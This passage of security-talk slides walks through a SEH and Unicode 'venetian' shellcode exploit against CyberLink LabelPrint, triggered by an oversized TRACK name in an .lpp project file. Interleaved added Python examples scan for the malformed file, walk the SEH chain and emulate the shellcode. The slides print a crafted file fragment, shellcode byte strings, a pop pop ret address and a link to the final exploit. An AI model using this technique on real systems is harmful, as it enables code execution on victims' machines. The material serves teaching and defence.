AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" />
         </INFORMATION>
         </PROJECT>
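The oversized TRACK name on slide 9 is also what a defender can look for in project files. The following is an added example, not code from the slides or the linked exploit: a small Python triage script that parses an .lpp project file and flags any TRACK name attribute longer than a threshold (MAX_TRACK_NAME is an assumed value, the slides give no limit). The sample project files are constructed here, UTF-16 input is decoded first since the application is Unicode-based, and a regex fallback keeps the check working when the XML is malformed.

```python
import re
import xml.etree.ElementTree as ET

# Assumed threshold: the slides show only that a very long name crashes the
# application, they do not give the exact limit.
MAX_TRACK_NAME = 256

# Constructed sample files modelled on the header shown on slide 8.
BENIGN = (b'<PROJECT version="1.0.00">'
          b'<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">'
          b'<TRACK name="My Disc" />'
          b'</INFORMATION></PROJECT>')
OVERSIZED = BENIGN.replace(b'name="My Disc"', b'name="' + b"A" * 800 + b'"')

TRACK_NAME_RE = re.compile(rb'<TRACK\b[^>]*?\bname="([^"]*)"')


def scan_lpp(data: bytes) -> list:
    """Return [(attribute, length)] for every TRACK name longer than MAX_TRACK_NAME."""
    # Project files saved as UTF-16 carry a BOM; normalise to UTF-8 before parsing.
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        data = data.decode("utf-16").encode("utf-8")
    findings = []
    try:
        root = ET.fromstring(data)
        for track in root.iter("TRACK"):
            name = track.get("name", "")
            if len(name) > MAX_TRACK_NAME:
                findings.append(("TRACK/@name", len(name)))
    except ET.ParseError:
        # Malformed XML (truncated or deliberately broken): fall back to a regex
        # so the oversized attribute is still reported instead of silently skipped.
        for match in TRACK_NAME_RE.finditer(data):
            if len(match.group(1)) > MAX_TRACK_NAME:
                findings.append(("TRACK/@name", len(match.group(1))))
    return findings


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, scan_lpp(sample))
```

Run it against any .lpp file by reading the file as bytes and passing it to scan_lpp; a non-empty result is a file worth quarantining before it is opened in the application.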
10. SEH Overwritten
    - Overwritten SE Handler

11. Unicode Based
    - AA or 4141 will be .A.A or 00410041

12. What is SEH?
    - A piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception (taken from corelan)
    - An exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions.
    - A catcher that tries to catch unusual behaviour.

13. What is SEH?
    This structure (also called a SEH record) is 8 bytes and has 2 (4-byte) elements:
    - a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)
    - a pointer to the actual code of the exception handler (SE Handler)

14. Abusing SEH
    In other words, the payload must do the following things:
    - Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won't kick in.
    - Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode).
    - Overwrite the SE handler with a pointer to an instruction that will bring you back to the next SEH and execute the jumpcode.
    - The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten "pointer to next SEH record" will jump to it.

15. Abusing SEH
    - When the exception occurs, the stack looks like this:
      [Figure: stack layout at the time of the exception; labels: Top of stack, Our pointer to next SEH address]
    - Possible values to overwrite the SE Handler with are POP something, POP something, RETN to the stack.
    - It will POP the address that sits at the top of the stack, POP again to take the second address, and RETN to execute the third address (which is now at the top of the stack).
    - The third address is usually our supplied input buffer.

16. Abusing SEH
    Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
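Slides 13 to 15 describe the SEH record layout and what an overwritten chain looks like. As an added example (not from the slides or the exploit), the Python below builds a constructed 32-bit stack image, walks the chain from its head the way a debugger's exception-chain view does, and flags records whose handler does not fall inside a loaded module, which is how the overwritten 0x00410041 handler from slide 11 shows up. All addresses and the module range are made up for the demo.

```python
import struct

# Constructed 32-bit layout for the demo: the stack region, one "loaded module"
# range and the chain terminator. None of these values come from the slides.
STACK_LO, STACK_HI = 0x0012F000, 0x00130000
MODULES = {"ntdll.dll": (0x7C900000, 0x7C9B0000)}
CHAIN_END = 0xFFFFFFFF


class Memory:
    """A flat byte array standing in for the stack; reads outside it return None."""

    def __init__(self, lo, hi):
        self.lo, self.buf = lo, bytearray(hi - lo)

    def write_record(self, addr, next_ptr, handler):
        off = addr - self.lo
        self.buf[off:off + 8] = struct.pack("<II", next_ptr, handler)

    def read_record(self, addr):
        off = addr - self.lo
        if off < 0 or off + 8 > len(self.buf):
            return None
        return struct.unpack("<II", self.buf[off:off + 8])


def walk_seh(mem, head, max_records=64):
    """Follow the chain from FS:[0] (head); each entry is (addr, next, handler).
    A pointer that leaves the stack is recorded as (addr, None, None) and stops the walk."""
    records, seen, addr = [], set(), head
    while addr != CHAIN_END and addr not in seen and len(records) < max_records:
        seen.add(addr)
        rec = mem.read_record(addr)
        if rec is None:
            records.append((addr, None, None))
            break
        records.append((addr, rec[0], rec[1]))
        addr = rec[0]
    return records


def in_module(addr):
    return any(lo <= addr < hi for lo, hi in MODULES.values())


def suspicious(records):
    """Records whose handler is not in any loaded module: an overwritten SE Handler
    points into attacker data (slide 11's 0x00410041) or into the stack, never into a module."""
    return [(addr, handler) for addr, _next, handler in records
            if handler is None or not in_module(handler)]


def build_chain(overwritten):
    """Two-record chain; with overwritten=True the first record holds the expanded 'AA'."""
    mem = Memory(STACK_LO, STACK_HI)
    rec1, rec2 = 0x0012FF60, 0x0012FFB0
    mem.write_record(rec2, CHAIN_END, 0x7C90E900)   # final handler inside "ntdll"
    if overwritten:
        mem.write_record(rec1, 0x00410041, 0x00410041)
    else:
        mem.write_record(rec1, rec2, 0x7C90E920)
    return mem, rec1


if __name__ == "__main__":
    for state in (False, True):
        mem, head = build_chain(overwritten=state)
        print("overwritten" if state else "clean", suspicious(walk_seh(mem, head)))
```

The same two checks (handler outside every module, next pointer outside the stack) are what `!mona seh` and a debugger's chain view rely on to spot a corrupted record before the handler is ever dispatched.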
17. Unicode?
    - Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.
    - Unicode-based exploits usually involve:
      - file/folder naming
      - input parameters that deal with naming

18. More Info
    - Structured Exception Handler (SEH)
      - https://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx
      - https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
      - https://blog.spentera.com/2011/09/14/seh-based-stack-overflow-the-basic/
    - Unicode-based exploit
      - https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/

19. SEH + Unicode = Venetian
    PROBABLY THE MOST HATED COMBINATION

20. Venetian Shellcode
    - One of the registers must point at the beginning of the shellcode.
    - One register must point at a memory location that is writeable (and where it's ok to write the new reassembled shellcode).
    - Normal venetian prepend shellcode:
      - Push another register to the stack (ESP)
      - Pop the stack (ESP) into EAX
      - Align the EAX register with add/sub instructions
      - Push the EAX register onto the stack (ESP)
      - RET (return to the beginning of the shellcode at EAX)
    - Sadly, we won't face a normal venetian approach.

21. Typical Venetian Unicode Prepend Opcode (flow)
    - Align EAX register: if we use EAX as BufferRegister, we need to align EAX to point to our buffer.
    - "Stack walking": walk over the Next SEH and SEH.
    - RET to shellcode: shellcode executed.

22. Typical Venetian Unicode Prepend Opcode
    Depends on where our buffer is. Use EAX as a BufferRegister.

        ven = "\x56"           #push esi
        ven += "\x41"          #align
        ven += "\x58"          #pop eax
        ven += "\x41"          #align
        ven += "\x05\x04\x01"  #add eax,01000400
        ven += "\x41"          #align
        ven += "\x2d\x01\x01"  #sub eax,01000100
        ven += "\x41"          #align
        ven += "\x50"          #push eax
        ven += "\x41"          #align
        ven += "\xc3"          #ret

23. Problem?
    - Limited instructions (because of Unicode)
    - Need to find a Unicode-friendly POP POP RET
    - All hex values between 0x80 and 0xFF are marked as bad
    - Yes, the RET opcode (C3) is also in the bad character list.
    - Meanwhile, our venetian shellcode needs RET
    [Figure: Typical Venetian]

24. Sh*t!

25. Solution
    - Find a proper Unicode-friendly PPR (pop pop ret) instruction address somewhere in the library or executable
    - Create "our version" of RET
    - Fill the stack (ESP) with our shellcode
    - Point our RET to a CALL ESP instruction address; this will alter the flow of execution.
    - EAX must point to the beginning of our shellcode.
    - "Stack walk" until we meet the shellcode.

26. Our Venetian Unicode Shellcode (flow)
    - Align EAX register
    - Calculate where RET will be placed
    - Construct RET in EAX
    - Calculate EAX for the CALL ESP opcode
    - Reaching RET, execute CALL ESP
    - Re-align EAX
    - "Stack walk" to shellcode
    - Bind shell 4444

27. pop pop ret
    - !mona seh
    - Fortunately, we found one Unicode-friendly address (0x0044002c) in the main program (LabelPrint.exe)
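Slides 11, 23 and 27 all rest on one transformation: every input byte is widened to UTF-16LE, so 'A' becomes 41 00, bytes 0x80-0xFF never survive, and only addresses of the form 0x00YY00XX can be produced from the input. The Python below is an added example (not from the slides or the exploit) that models that expansion and checks addresses against it, which is the filter behind the 0x0044002c pop pop ret address on slide 27; treating 0x00 as unusable is an assumption added here, the slides only name the 0x80-0xFF range.

```python
# Bad range from slide 23; 0x00 is excluded as well (assumption: it terminates the string).
BAD_BYTES = set(range(0x80, 0x100)) | {0x00}


def expand(payload: bytes) -> bytes:
    """Model the ASCII->UTF-16LE conversion from slide 11: 'A' (0x41) becomes 41 00."""
    return b"".join(bytes((b, 0)) for b in payload)


def as_dword(buf: bytes) -> int:
    """Read the first four bytes little-endian, as the CPU reads a saved pointer."""
    return int.from_bytes(buf[:4], "little")


def survives_expansion(payload: bytes) -> bool:
    """True when every byte is passed through unchanged (no bad byte present)."""
    return all(b not in BAD_BYTES for b in payload)


def unicode_friendly_address(addr: int) -> bool:
    """An address can come from the expanded input only if it is 0x00YY00XX with XX
    and YY usable: XX and YY are what the input holds, the zero bytes come from expansion."""
    raw = addr.to_bytes(4, "little")
    return raw[1] == 0 and raw[3] == 0 and survives_expansion(bytes((raw[0], raw[2])))


def filter_friendly(candidates):
    """Keep only the pop pop ret candidates that the expansion can reproduce."""
    return [a for a in candidates if unicode_friendly_address(a)]


if __name__ == "__main__":
    print(expand(b"AA").hex(), hex(as_dword(expand(b"AA"))))   # 41004100 0x410041
    print(unicode_friendly_address(0x0044002C))                 # True
    print(survives_expansion(b"\xc3"))                          # False: RET cannot be typed
```

The same test explains slide 23: a single 0xC3 byte fails survives_expansion, so RET cannot appear in the input and has to be manufactured in a register instead.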
28. Construct RET (1)
    - Calculate the value of the EAX register, preparing the address where exactly we want the decoded RET to be placed later on the stack.
    - Limited calculation (because of UNICODE)
    - Zero the EAX register first: xor eax,eax

29. Construct RET (2)
    Preparing the address to push our RET:
    - push esp
    - pop eax
    - add EAX with 01001B00
    - sub EAX with 01000100
    - push EAX
    - pop ESP

        ven += "\x42"          #nop
        ven += "\x54"          #push esp
        ven += "\x42"          #nop
        ven += "\x58"          #pop eax
        ven += "\x42"          #nop
        ven += "\x05\x1B\x01"  #add eax,01001B00
        ven += "\x42"          #nop
        ven += "\x2d\x01\x01"  #sub eax,01000100
        ven += "\x42"          #nop
        ven += "\x50"          #push eax
        ven += "\x42"          #nop
        ven += "\x5c"          #pop esp

30. Construct RET (3)
    - After the calculation in EAX, the stack pointer (ESP) now points at 0x0012F655 (the same value as EAX).
    - This is important for our RET decoding address later.

31. Construct RET (4)

32. Zeroing Out EAX
    - We need to clear the EAX register for the next calculation of the RET opcode.
    - After EAX is zeroed out we can calculate the EAX register to reach 0xC300C300 (RET opcode).
    - We can perform the zeroing with AND operations:
      - AND EAX with 7e007e00
      - AND EAX with 01000100

33. Zeroing Out EAX

        ven += "\x42"          #nop
        ven += "\x25\x7e\x7e"  #and eax,7e007e00
        ven += "\x42"          #nop
        ven += "\x25\x01\x01"  #and eax,01000100

34. Construct RET (5)
    Preparing the RET opcode:
    - Zero out EAX first (done)
    - XOR EAX with 7f007f00
    - ADD EAX with 44004400
    - PUSH EDI
    - PUSH EAX

35. The RET Opcode (1)

        ven += "\x35\x7f\x7f"  #xor eax,7f007f00
        ven += "\x42"          #nop
        ven += "\x05\x44\x44"  #add eax,44004400
        ven += "\x42"          #nop
        ven += "\x57"          #push edi/padding
        ven += "\x42"          #nop
        ven += "\x50"          #push eax
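Slides 29, 33 and 35 build the RET opcode arithmetically because 0xC3 cannot survive the expansion. The Python below is an added example (not from the slides or the exploit) that expands the slides' own byte strings, decodes the small x86 subset they use, including the `00 xx` filler that the slides label `#nop`, and emulates the EAX and stack operations involved, so the reader can check that the sequence really leaves 0xC300C300 in EAX and on the stack. The starting ESP is a constructed value; the fragments on slides 29 and 33 are decoded behind a leading 0x00 byte (the trailing byte left by the preceding one-byte instruction), and slide 35 is decoded from an instruction boundary, which is what its comments assume.

```python
MASK = 0xFFFFFFFF
REG_OPS = {0x41: "inc ecx", 0x42: "inc edx", 0x44: "inc esp", 0x50: "push eax",
           0x54: "push esp", 0x56: "push esi", 0x57: "push edi", 0x58: "pop eax",
           0x5c: "pop esp", 0xc3: "ret"}
IMM_OPS = {0x05: "add", 0x25: "and", 0x2d: "sub", 0x35: "xor"}   # <op> eax, imm32

# The 'ven' fragments copied from slides 29, 33 and 35.
SLIDE29 = b"\x42\x54\x42\x58\x42\x05\x1b\x01\x42\x2d\x01\x01\x42\x50\x42\x5c"
SLIDE33 = b"\x42\x25\x7e\x7e\x42\x25\x01\x01"
SLIDE35 = b"\x35\x7f\x7f\x42\x05\x44\x44\x42\x57\x42\x50"


def expand(payload):
    """ASCII -> UTF-16LE as the application does it: each byte b becomes b 00."""
    return b"".join(bytes((b, 0)) for b in payload)


def modrm_size(code, i):
    """Bytes taken by the ModRM byte at code[i] plus its SIB/displacement (32-bit mode)."""
    modrm = code[i]
    mod, rm = modrm >> 6, modrm & 7
    size = 1
    if mod == 3:
        return size
    if rm == 4:                                   # SIB byte follows
        size += 1
        if mod == 0 and (code[i + 1] & 7) == 5:   # base=101 with mod 0 means disp32
            size += 4
    if mod == 1:
        size += 1
    elif mod == 2 or (mod == 0 and rm == 5):
        size += 4
    return size


def disasm(code):
    """Decode the subset used on the slides into (mnemonic, operand) tuples.
    Opcode 00 (ADD r/m8, r8) is what absorbs the zero bytes: '00 42 00' is the filler."""
    out, i = [], 0
    while i < len(code):
        op = code[i]
        if op == 0x00:
            if i + 1 >= len(code):
                out.append(("pad", "00"))
                break
            n = 1 + modrm_size(code, i + 1)
            out.append(("add8", code[i:i + n].hex()))
            i += n
        elif op in IMM_OPS:
            out.append((IMM_OPS[op], int.from_bytes(code[i + 1:i + 5], "little")))
            i += 5
        elif op in REG_OPS:
            out.append((REG_OPS[op], None))
            i += 1
        else:
            raise ValueError(f"opcode {op:#04x} at offset {i} is outside the modelled subset")
    return out


def emulate(instrs, regs, stack):
    """Apply the decoded subset to a register dict and a sparse stack {addr: dword}.
    The 'add8' filler is treated as a no-op, as the slides' '#nop' comments treat it."""
    for mnem, imm in instrs:
        if mnem in IMM_OPS.values():
            a = regs["eax"]
            regs["eax"] = {"and": a & imm, "xor": a ^ imm,
                           "add": (a + imm) & MASK, "sub": (a - imm) & MASK}[mnem]
        elif mnem.startswith("push "):
            value = regs[mnem[5:]]
            regs["esp"] = (regs["esp"] - 4) & MASK
            stack[regs["esp"]] = value
        elif mnem.startswith("pop "):
            value = stack.get(regs["esp"], 0)
            regs["esp"] = (regs["esp"] + 4) & MASK
            regs[mnem[4:]] = value
        elif mnem.startswith("inc "):
            regs[mnem[4:]] = (regs[mnem[4:]] + 1) & MASK
        elif mnem == "ret":
            regs["eip"] = stack.get(regs["esp"], 0)
            regs["esp"] = (regs["esp"] + 4) & MASK
    return regs


def build_ret(esp0=0x0012DC58):
    """Run slides 29, 33 and 35 from a constructed ESP (the real value is not on the
    slides) and return (eax, esp, dword at esp)."""
    regs = {"eax": 0xDEADBEEF, "ecx": 0, "edx": 0, "esp": esp0, "esi": 0,
            "edi": 0x42424242, "eip": 0}
    stack = {}
    # Slides 29 and 33 open with \x42: they expect the previous instruction's trailing
    # 0x00 still ahead of them, supplied here as a leading byte.
    emulate(disasm(b"\x00" + expand(SLIDE29 + SLIDE33)), regs, stack)
    # Slide 35 opens on an instruction boundary (xor eax, imm32).
    emulate(disasm(expand(SLIDE35)), regs, stack)
    return regs["eax"], regs["esp"], stack[regs["esp"]]


if __name__ == "__main__":
    for instr in disasm(b"\x00" + expand(SLIDE33)):
        print(instr)
    eax, esp, top = build_ret()
    print(f"eax={eax:#010x} esp={esp:#010x} [esp]={top:#010x}")
```

Two things the decoder makes visible: the immediate of each three-byte fragment is built from the expansion's own zero bytes (`\x25\x7e\x7e` becomes `25 00 7e 00 7e 00`, i.e. and eax,0x7e007e00), and the filler only works while the byte parity is right, which is why every fragment alternates a one-byte instruction with a five-byte one.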
36. The RET Opcode (2)

37. Construct CALL to ESP (1)

38. Construct CALL to ESP (2)

39. Construct CALL to ESP (3)

40. Stack Walk to Shellcode

41. Our Venetian Shellcode

        ven += "\x58"          #pop eax
        ven += "\x42"          #nop
        ven += "\x58"          #pop eax
        ven += "\x42"          #nop
        ven += "\x05\x10\x01"  #add eax,01001000, align eax to our buffer
        ven += "\x42"          #nop
        ven += "\x2d\x0e\x01"  #sub eax,01000e00, align eax to our buffer
        ven += "\x42"          #nop
        ven += "\x50"          #push eax
        ven += "\x42"          #nop
        ven += "\x5C"          #pop esp
        ven += "\x42"          #nop
        ven += "\x58"          #pop eax
        ven += "\x42"          #nop
        ven += "\x05\x53\x7c"  #add eax,7c005300, part of call esp
        ven += "\x42"          #nop
        ven += "\x50"          #push eax
        ven += "\x42" * 68     #padding to fill the stack
        ven += "\x7b\x32"      #part of call esp

42. Final Exploit
    https://www.exploit-db.com/exploits/42777/

43. Solution
    - For now, do not use CyberLink LabelPrint.

44. Thank you
    research@spentera.id
